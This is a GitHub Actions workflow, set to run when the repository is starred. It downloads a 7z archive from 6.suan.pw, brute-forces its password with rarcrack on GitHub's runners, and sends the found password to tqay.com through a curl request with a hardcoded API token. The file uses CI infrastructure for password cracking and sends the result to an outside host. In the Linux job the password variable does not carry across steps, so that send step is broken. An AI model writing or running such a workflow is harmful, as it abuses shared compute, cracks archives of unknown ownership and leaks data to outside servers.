name: build

on:
  watch:
    types: started

env:
  LIBSTDC_VERSION: 5

jobs:
  linux:
    runs-on: ubuntu-latest

    strategy:
      fail-fast: false

    steps:
      - name: Checkout Project
        uses: actions/checkout@v2

      - name: Run Build
        run: make clean && make

      - name: wget
        run: 
            wget 6.suan.pw/k2p.bin -O 1.7z;
      - name: Run rarcrack
        run: 
            ./rarcrack --type 7z 1.7z;
      - name: set
        run: 
            PWD=$(cat 1.7z.xml |grep good);
      - name: send
        run: 
            curl "http://tqay.com/wxsms.php?token=apitokenisapi&title=Password&msg=$(echo $PWD)"

  macos:
    runs-on: macos-latest

    strategy:
      fail-fast: false

    steps:
      - name: Checkout Project
        uses: actions/checkout@v2

      - name: Run Build
        run: make clean && make

      - name: Run rarcrack
        run:  
            curl 6.suan.pw/k2p.bin -o 1.7z;
            ./rarcrack --type 7z 1.7z;
            PWD=$(cat 1.7z.xml |grep good);
            curl "http://tqay.com/wxsms.php?token=apitokenisapi&title=Password&msg=$(echo $PWD)"
